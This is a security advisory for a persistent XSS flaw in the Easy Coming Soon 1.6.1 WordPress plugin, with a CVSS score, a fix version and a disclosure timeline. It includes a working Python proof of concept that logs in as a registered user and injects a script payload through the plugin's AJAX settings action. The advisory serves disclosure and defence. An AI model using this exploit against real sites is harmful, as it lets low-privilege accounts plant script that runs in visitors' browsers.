Easy Coming Soon 1.6.1, Persistent XSS
The AJAX function ‘coming_soon_page_settings’, defined in ‘easy-coming-soon/coming-soon-plugin.php’ is available to any registered user. This allows any registered user of the site to enable, and update the settings in the ‘Easy Coming Soon’ Plugin, to output any arbitrary HTML/JS code they wish.
Homepage
https://wordpress.org/plugins/easy-coming-soon/
CVSS Score
4
CSSS Vector
(AV:N/AC:L/Au:S/C:N/I:P/A:N)
Attack Scope
remote
Authorization Required
Registered
Mitigation
Update to version 1.6.3.
Proof of Concept
import requests
s = requests.session()
target = 'http://localhost'
url = '%s/wp-login.php'%target
payload = {
"log":"test",
"pwd":"test",
"wp-submit":"Log+In"
}
r = s.post(url, data=payload)
# Update plugin settings to allow exploitation
url = '%s/wp-admin/admin-ajax.php'%target
payload = {
"action":"coming_soon_page_settings",
"status":"1",
"title":"<script>alert(1)</script>"
}
r = s.post(url, data=payload)Timeline
- 2015-02-10: Discovered
- 2015-02-10: Vendor notified
- 2015-02-10: Vendor responded
- 2015-02-10: 1.6.2 released – issue still present
- 2015-03-02: Requested follow-up – provided example of how to resolve issue.
- 2015-03-09: Requested follow-up
- 2015-03-11: Version 1.6.3 released – issue resolved
- 2015-03-18: Advisory released